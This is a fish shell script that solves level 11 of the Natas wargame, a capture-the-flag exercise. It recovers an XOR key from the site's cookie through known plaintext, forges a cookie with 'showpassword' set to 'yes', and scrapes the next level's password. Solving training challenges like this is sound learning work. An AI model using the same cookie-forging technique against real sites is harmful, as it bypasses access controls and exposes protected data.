Natas 11 to 12.sh

#!/bin/fish

set cookie (nget -l 11 -- -S 2>&1 | grep Set-Cookie | sed -E 's/.+data=([a-zA-Z0-9%]+).*/\1/g' | urldecode)

echo "Cookie: $cookie" >&2

set file (mktemp "XXXXXXXX.php")
set tmp_file (mktemp "XXXXXXXX.php")


# Getting key

# Abusing XOR:
# A xor B = C           0110 xor 1100 = 1010
# A = B xor C    0110 = 1100 xor 1010

echo '<?php' > $file

echo '$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");' >> $file

echo 'function xor_encrypt($key, $in) {' >> $file
echo '  $text = $in;' >> $file
echo '  $outText = "";' >> $file
echo '' >> $file
echo '  // Iterate through each character' >> $file
echo '  for($i=0;$i<strlen($text);$i++) {' >> $file
echo '    $outText .= $text[$i] ^ $key[$i % strlen($key)];' >> $file
echo '  }' >> $file
echo '' >> $file
echo '  return $outText;' >> $file
echo '}' >> $file

echo 'function saveData($d) {' >> $file
echo '  setcookie("data", base64_encode(xor_encrypt(json_encode($d))));' >> $file
echo '}' >> $file



echo '<?php require "'"$file"'"; echo xor_encrypt(base64_decode("'"$cookie"'"), json_encode($defaultdata));' > $tmp_file


set key (php $tmp_file)

# Remove repetition in key
for len in (seq 1 10)
  set a (string sub -l $len $key)
  set b (string sub -s (math $len + 1) -l $len $key)

  if [ "$a" = "$b" ]
    set key (string sub -l $len $key)
    break
  end
end


echo "Key: $key" >&2

echo '<?php require "'"$file"'"; echo base64_encode(xor_encrypt("'"$key"'", json_encode(array( "showpassword"=>"yes", "bgcolor"=>"#ffffff"))));' > $tmp_file

set payload (php $tmp_file)

echo "Payload: $payload" >&2

set level (nget -l 11 -- --header "Cookie: data=$payload")
set password (echo "$level" | grep "The password for natas12 is " | sed -E 's/.+natas12 is ([a-zA-Z0-9]+).+/\1/g')

echo "$password"